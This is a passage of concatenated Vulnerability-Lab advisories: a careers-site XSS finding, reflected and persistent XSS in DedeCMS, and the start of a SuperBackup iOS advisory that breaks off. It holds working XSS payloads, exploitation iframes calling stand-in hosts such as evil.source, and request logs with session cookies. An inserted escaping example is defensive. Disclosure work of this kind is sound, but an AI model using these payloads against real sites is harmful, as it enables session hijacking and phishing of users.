https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Laufbahnen:Unteroffiziere;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E



PoC: Vulnerable Source
<div class="row">
<div class="col-lg-6 col-md-6 col-sm-6 col-xs-12 js-filter
js-filter-multi" data-defaultlabel="Bitte wählen Sie"
data-selectlabel="gewählt" data-update="true"
data-required="false" data-disabled="true" data-connection="OR"
data-key="subjecttaxonomy" data-label="Organisationsbereiche"
data-id="33052">
<h5 class="">Organisationsbereiche</h5>
<select class="filter-select js-select select2-hidden-accessible"
multiple="" data-enable-placeholder="true" data-placeholder="Bitte
wählen Sie" tabindex="-1" style="" aria-hidden="true">
<option data-label="Bundeswehrverwaltung" data-id="31730"
data-facet="0" value="31730"
data-text="Bundeswehrverwaltung">Bundeswehrverwaltung</option>
<option data-label="Heer" data-id="31732" data-facet="0"
value="31732" data-text="Heer">Heer</option>
<option data-label="Luftwaffe" data-id="31820" data-facet="0"
value="31820" data-text="Luftwaffe">Luftwaffe</option>
<option data-label="Marine" data-id="31822" data-facet="0"
value="31822" data-text="Marine">Marine</option>
<option data-label="Streitkraeftebasis" data-id="31824"
data-facet="0" value="31824"
data-text="Streitkräftebasis">Streitkräftebasis</option>
<option data-label="Sanitaetsdienst" data-id="50290"
data-facet="0" value="50290"
data-text="Sanitätsdienst">Sanitätsdienst</option>
</select><span class="select2 select2-container
select2-container--default" dir="ltr" style="width: 155px;"><span
class="selection"><span class="select2-selection
select2-selection--multiple"
role="combobox" aria-autocomplete="list" aria-haspopup="true"
aria-expanded="false" tabindex="-1"><ul
class="select2-selection__rendered"><li class="select2-search
select2-search--inline first last">
<span tabindex="0" class="search-placeholder" data-title="Bitte wählen
Sie" data-defaulttitle="Bitte wählen Sie"><input
class="select2-selection--multiple select2-search__field" type="button">
</span></li></ul></span></span><span class="dropdown-wrapper"
aria-hidden="true"></span></span>
</div><div class="col-lg-6 col-md-6 col-sm-6 col-xs-12 js-filter
js-filter-single" data-defaultlabel="Bitte wählen Sie"
data-update="true" data-connection="OR" data-key="subjecttaxonomy"
data-required="false" data-disabled="true" data-label="Laufbahnen"
data-id="33122">
<h5 class="">Laufbahnen</h5>
<div class="btn-group-responsive">
<select class="filter-select js-select
select2-hidden-accessible" data-enable-placeholder="true"
data-placeholder="Bitte wählen Sie" tabindex="-1" style=""
aria-hidden="true">
<option>Bitte wählen Sie</option>
<option data-label="Mannschaften" data-id="31858"
data-facet="0" value="31858" data-text="Mannschaften">Mannschaften</option>
<option data-label="Unteroffiziere" data-id="31864"
data-facet="0" value="31864"
data-text="Unteroffiziere">Unteroffiziere</option>
<option data-label="Feldwebel" data-id="31860" data-facet="0"
value="31860" data-text="Feldwebel">Feldwebel</option>
<option data-label="Offiziere" data-id="31862" data-facet="0"
value="31862" data-text="Offiziere">Offiziere</option>
<option data-label="Reserve" data-id="50304" data-facet="0"
value="50304" data-text="Reserve">Reserve</option>
<option data-label="Mittlerer_Dienst" data-id="41976"
data-facet="0" value="41976" data-text="Mittlerer Dienst">Mittlerer
Dienst</option>
<option data-label="Gehobener_Dienst" data-id="41978"
data-facet="0" value="41978" data-text="Gehobener Dienst">Gehobener
Dienst</option>
<option data-label="Hoeherer_Dienst" data-id="41980"
data-facet="0" value="41980" data-text="Höherer Dienst">Höherer
Dienst</option>
</select><span class="select2 select2-container
select2-container--default select2-container--below" dir="ltr"
style="width: 125px;"><span class="selection">
<span class="select2-selection select2-selection--single"
role="combobox" aria-autocomplete="list" aria-haspopup="true"
aria-expanded="false" tabindex="0"
aria-labelledby="select2-kbwa-container"><span
class="select2-selection__rendered" id="select2-kbwa-container"
title="Unteroffiziere"><span><span class="js-label">Unteroffiziere</span>
<span class="caret"></span></span></span><span
class="select2-selection__arrow" role="presentation"><b
role="presentation"></b></span></span></span>
<span class="dropdown-wrapper" aria-hidden="true"></span></span>
</div>
</div></div>
<div class="row">
<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 js-filter
js-filter-search" data-update="true" data-connection="OR" data-key="search"
data-required="false" data-disabled="true" data-label="Suche"
data-id="33126">
<h5 class=" hidden">Suche</h5>
<div class="form-group">
<input class="form-control js-search-input"
placeholder="Suchbegriff" type="text">
<input id="search-term" class="js-search-submit" value="Suche"
type="button">
</div>
</div></div>
PoC: Execution
Suche
Laufbahn
Bitte wählen Sie**
AuswahlX
<javascript:void();>AbiturX>"<[MALICIOUS PAYLOAD!]
<javascript:void();>UnteroffiziereX>"<[MALICIOUS PAYLOAD!]
<javascript:void();>FuehrungX>"<[MALICIOUS PAYLOAD!]
<javascript:void();>test >"<[MALICIOUS PAYLOAD!]
//
Laufbahnen
* // Laufbahnen <#>
* // Jobprofile <#>
* // Auch interessant <#>
Keine Treffer gefunden
Bitte geben Sie Ihren bereits erreichten oder angestrebten
Schulabschluss an, damit wir Ihnen Ihre passenden Jobmöglichkeiten
anzeigen koennen.


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
https://www.bundeswehrkarriere.de/ajax/filterlist/de/auswahl/33050/h_368f9ea9884c87f4c9d45368542ba48f?subjecttaxonomy=33120%2331848%3B33118%2331770%3B33052%2331732%3B33122%2341980%3B50510%2350470
&search=33126%23%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fwww.test.de%3E&limit=12&offset=0&sort=relevance+asc%3Bsearchdate+asc

Mime Type[text/html]
Request Header:
Host[www.bundeswehrkarriere.de]
Referer[https://www.bundeswehrkarriere.de/karriere]
Connection[keep-alive]
Response Header:
200 OK
Server[Apache]
Content-Type[text/html;charset=UTF-8]
Content-Language[de]
x-varnish[23952790]
Via[1.1 varnish-v4]
Accept-Ranges[bytes]
Connection[close]


Solution - Fix & Patch:
=======================
The security gap can be quickly resolved by the following work-around ...
1. Input fields must prevent the input of special characters (disallow special chars)
2. Parse or filter the content of the parameters via GET to prevent input
3. Use the escape function for the output at the end of the function
4. Check why the SSL certificate does not expire on external calls
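The hash-parameter reflection described in the technical details and the escape-on-output fix from the solution list, as an added example that is not code from the advisory or from the bundeswehrkarriere.de site: it parses the `#auswahl=Key:Value;...` fragment format of the PoC URLs and contrasts an innerHTML-style renderer with an escaping one. The key allow-list is taken from the PoC URLs; `parseAuswahl`, `renderSafe` and the other names are assumptions.

```javascript
// Added example, not code from the advisory or the site. Models the
// "#auswahl=Key:Value;Key:Value" fragment format of the PoC URLs.
// KNOWN_KEYS holds the filter names seen in those URLs (an assumption
// about the complete set); everything else is constructed here.
const KNOWN_KEYS = new Set([
  "Militaerisch/Zivil", "Abschluss", "Interessen", "Laufbahnen", "Suche",
]);

// decodeURIComponent throws on malformed escapes such as "%E0%A4%A";
// keep the raw text in that case instead of crashing the page script.
function safeDecode(text) {
  try {
    return decodeURIComponent(text);
  } catch (_err) {
    return text;
  }
}

// Parse "#auswahl=Abschluss:Abitur;Suche:test" into { Abschluss: "Abitur", ... }.
// Values are percent-decoded but must still be treated as untrusted input.
function parseAuswahl(hash) {
  const selection = {};
  const match = /^#?auswahl=(.*)$/.exec(hash || "");
  if (!match) return selection;
  for (const pair of match[1].split(";")) {
    const sep = pair.indexOf(":"); // first colon separates key and value
    if (sep <= 0) continue;        // skip empty or malformed pairs
    selection[safeDecode(pair.slice(0, sep))] = safeDecode(pair.slice(sep + 1));
  }
  return selection;
}

// Drop any key that is not one of the known filter names: an allow-list on
// the key side removes one injection point entirely.
function filterKnown(selection) {
  const kept = {};
  for (const [key, value] of Object.entries(selection)) {
    if (KNOWN_KEYS.has(key)) kept[key] = value;
  }
  return kept;
}

// Vulnerable pattern: the selection is interpolated straight into markup,
// so a value such as ' >"<iframe ...>' becomes live HTML once the string
// is assigned to innerHTML. Kept only to contrast with renderSafe below.
function renderUnsafe(selection) {
  return Object.entries(selection)
    .map(([key, value]) => `<li data-key="${key}">${value}</li>`)
    .join("");
}

// Escape the five characters that matter in HTML text and double-quoted
// attribute contexts; this is the "escape function for the output" that
// the fix list asks for.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: unknown keys are dropped and every interpolated value
// is escaped for its context. In a browser, assigning element.textContent
// instead of building a string is the simpler equivalent for the text part.
function renderSafe(selection) {
  return Object.entries(filterKnown(selection))
    .map(([key, value]) => `<li data-key="${escapeHtml(key)}">${escapeHtml(value)}</li>`)
    .join("");
}

// True when a rendered string still contains an element tag other than the
// <li> wrapper; used as a check that no markup came from user input.
function containsTag(html) {
  return /<[a-z][^>]*>/i.test(html.replace(/<\/?li\b[^>]*>/gi, ""));
}

// Constructed sample: the fragment of the advisory's first PoC URL.
const SAMPLE_HASH =
  "#auswahl=Militaerisch/Zivil:%20%3E%22%3Ciframe%20src=evil.source%20" +
  "onload=alert(%22CYBERALLIANZ%22)%3E;Abschluss:Abitur;Interessen:Fuehrung;" +
  "Laufbahnen:Unteroffiziere;Suche:test";

if (typeof require !== "undefined" && require.main === module) {
  const selection = parseAuswahl(SAMPLE_HASH);
  console.log("unsafe renderer emits a tag:", containsTag(renderUnsafe(selection)));
  console.log("safe renderer emits a tag:  ", containsTag(renderSafe(selection)));
}
```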


Security Risk:
==============
The security risk of client-side cross site scripting web vulnerability
in the Bundeswehr career application is to be rated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.



Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™






--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

DedeCMS 7.5 SP2 Cross Site Scripting


DedeCMS version 7.5 SP2 suffers from multiple cross site scripting vulnerabilities.


MD5 | d16df83b666b2c7a6d63f3fab899343a

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Cross Site Scripting Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2194


Release Date:
=============
2020-04-08


Vulnerability Laboratory ID (VL-ID):
====================================
2194


Common Vulnerability Scoring System:
====================================
4.1


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Welcome to the most professional PHP website content management system
in China, the Zhimeng content management system; it will be your first
choice for easy website building. It adopts XML namespace style core
templates: all templates are saved in file form, which provides great
convenience for users when designing templates and transferring website
upgrades. The robust template tags provide strong support for webmasters
to build their own websites. A high-efficiency tag caching mechanism
allows the caching of similar tags; when generating HTML, it helps to
improve the reaction speed of the system and reduce the resources
consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.


Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2


Vulnerability Disclosure Timeline:
==================================
2020-04-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple non-persistent cross site scripting vulnerabilities have been
discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
The vulnerabilities allow remote attackers to inject their own malicious
script code with a non-persistent attack vector to compromise browser to
web-application requests from the client-side.

The cross site scripting web security vulnerabilities are located in the
`filename`, `mid`, `userid` and `templet` parameters of the `tpl.php`,
`mychannel_edit.php`, `file_manage_view.php`, `sys_admin_user_edit.php`
and `makehtml_homepage.php` files. The request method to inject the
malicious script code is GET and the attack vector of the vulnerability
is non-persistent on the client-side.

Remote attackers are able to inject their own script code into the
client-side requested vulnerable web-application parameters. The attack
vector of the vulnerability is non-persistent and the request method to
inject/execute is GET. The vulnerabilities are classic client-side cross
site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, non-persistent phishing
attacks, non-persistent external redirects to malicious sources and
non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] tpl.php
[+] mychannel_edit.php
[+] file_manage_view.php
[+] sys_admin_user_edit.php
[+] makehtml_homepage.php

Vulnerable Parameter(s):
[+] filename
[+] mid
[+] userid
[+] templet


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers without
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Request: Examples
https://test23.localhost:8080/dede/tpl.php?acdir=default&action=edit&filename=data.html
https://test23.localhost:8080/dede/mychannel_edit.php?mid=1&dopost=modifysearch
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=edit&filename=data.html&activepath=
https://test23.localhost:8080/dede/sys_admin_user_edit.php?id=1&userid=23&dopost=delete
https://test23.localhost:8080/dede/makehtml_homepage.php?dopost=view&templet=13


PoC: Payload
>">%20<iframe src=evil.source/file.js onload=alert(x)>
>">%20<img src=evil.source/file.js onload=alert(x)>


PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/tpl.php?acdir=default&action=edit&filename=>">%20<iframe
src=evil.source onload=alert(x)>%20">
<iframe
src="https://test23.localhost:8080/dede/mychannel_edit.php?mid=>">%20<iframe
src=evil.source onload=alert(x)>&dopost=modifysearch">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=edit&filename=>">%20<iframe
src=evil.source onload=alert(x)>&activepath=">
<iframe
src="https://test23.localhost:8080/dede/sys_admin_user_edit.php?id=1&userid="><iframe
src=evil.source onload=alert(document.domain)>&dopost=delete">
<iframe
src="https://test23.localhost:8080/dede/makehtml_homepage.php?dopost=view&templet=>">%20<iframe
src=evil.source onload=alert(x)>%20">
...


Reference(s):
https://test23.localhost:8080/dede/tpl.php
https://test23.localhost:8080/dede/mychannel_edit.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/dede/sys_admin_user_edit.php
https://test23.localhost:8080/dede/makehtml_homepage.php


Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars
2. Restrict the vulnerable parameter input to prevent injects via GET
method request
3. Secure the output location where the content is delivered as output
without proper sanitization


Security Risk:
==============
The security risk of the client-side non-persistent cross site scripting
web vulnerabilities in the different modules are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.




--
Company Name: Vulnerability Laboratory (Vulnerability Lab)
Address: Ludwig-Erhard Straße 4 - 34131 Kassel (Germany)
Representative: Geschäftsführer & Administrator

Phone: +49(0)561-40085396
Fax: +49(0)561-81024871
PGP:
https://www.vulnerability-lab.com/keys%2Fadmin%40vulnerability-lab.com(0x198E9928).txt
Domain: www.vulnerability-lab.com



DedeCMS 7.5 SP2 Persistent Cross Site Scripting


DedeCMS version 7.5 SP2 suffers from multiple persistent cross site scripting vulnerabilities.


MD5 | cd386484581015658d08a7be59921b13

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195


Release Date:
=============
2020-04-09


Vulnerability Laboratory ID (VL-ID):
====================================
2195


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Welcome to the most professional PHP website content management system
in China, the Zhimeng content management system; it will be your first
choice for easy website building. It adopts XML namespace style core
templates: all templates are saved in file form, which provides great
convenience for users when designing templates and transferring website
upgrades. The robust template tags provide strong support for webmasters
to build their own websites. A high-efficiency tag caching mechanism
allows the caching of similar tags; when generating HTML, it helps to
improve the reaction speed of the system and reduce the resources
consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.


Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2


Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities have been
discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
The vulnerabilities allow remote attackers to inject their own malicious
script code with a persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent script code injection web vulnerabilities are located in
the `activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
and `CKEditorFuncNum` parameters of the `file_pic_view.php`,
`file_manage_view.php`, `tags_main.php`, `select_media.php` and
`media_main.php` files.
The attack vector of the vulnerability is non-persistent and the request
method to inject is POST. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious sources and persistent manipulation
of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php

Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en


PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E


PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
src=evil.source
onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
src=evil.source onload=alert(document.domain)>2&langCode=en">
...

--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img
src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php
?activepath=%2Fuploads%2F>"
<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer:
https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?
CKEditor=>"><iframe src=evil.source
onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2


Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php


Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars on the
affected input fields
2. Restrict the vulnerable parameter to prevent injects via POST method
requests
3. Secure the output location where the insecurely sanitized content is
delivered as output


Security Risk:
==============
The security risk of the application-side persistent cross site
scripting web vulnerabilities in the different modules is estimated as
medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™


--
Company Name: Vulnerability Laboratory (Vulnerability Lab)
Address: Ludwig-Erhard Straße 4 - 34131 Kassel (Germany)
Representative: Geschäftsführer & Administrator

Phone: +49(0)561-40085396
Fax: +49(0)561-81024871
PGP:
https://www.vulnerability-lab.com/keys%2Fadmin%40vulnerability-lab.com(0x198E9928).txt
Domain: www.vulnerability-lab.com



SuperBackup 2.0.5 Persistent Cross Site Scripting


SuperBackup version 2.0.5 for iOS suffers from a persistent cross site scripting vulnerability.


MD5 | b38fee9254f243aad26218abafa9c63f

Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2202


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
